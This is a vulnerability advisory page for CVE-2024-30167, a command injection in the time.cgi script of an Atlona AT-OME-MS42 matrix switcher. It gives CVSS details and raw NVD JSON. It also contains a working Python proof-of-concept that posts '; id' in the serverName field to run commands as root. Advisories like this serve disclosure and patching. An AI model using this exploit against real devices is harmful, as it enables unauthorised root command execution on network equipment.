Security Vulnerability Report
中文
CVE-2024-30167 CVSS 6.3 MEDIUM

CVE-2024-30167

Published: 2026-05-08 06:16:09
Last Modified: 2026-05-08 16:02:14

Description

/cgi-bin/time.cgi in Atlona AT-OME-MS42 Matrix Switcher 1.1.2 allow remote authenticated users to execute arbitrary commands as root via a POST request that carries a serverName parameter.

CVSS Details

CVSS Score
6.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Atlona AT-OME-MS42 Matrix Switcher 1.1.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # Target URL of the vulnerable cgi script target_url = "http://target-ip/cgi-bin/time.cgi" # Attacker's session cookie (Authentication is required as per PR:L) cookies = { "session_id": "valid_auth_token_here" } # Payload to execute 'id' command using command injection # The semicolon (;) terminates the intended command and executes the injected one payload = "; id" # The vulnerable parameter data = { "serverName": payload } try: response = requests.post(target_url, data=data, cookies=cookies, timeout=10) print(f"Status Code: {response.status_code}") print("Response Body:") print(response.text) # Check if command execution was successful (e.g., looking for 'uid=0(root)') if "uid=" in response.text: print("[+] Command injection successful!") except Exception as e: print(f"Error: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2024-30167", "sourceIdentifier": "[email protected]", "published": "2026-05-08T06:16:09.160", "lastModified": "2026-05-08T16:02:14.343", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "/cgi-bin/time.cgi in Atlona AT-OME-MS42 Matrix Switcher 1.1.2 allow remote authenticated users to execute arbitrary commands as root via a POST request that carries a serverName parameter."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-77"}]}], "references": [{"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/285733", "source": "[email protected]"}]}}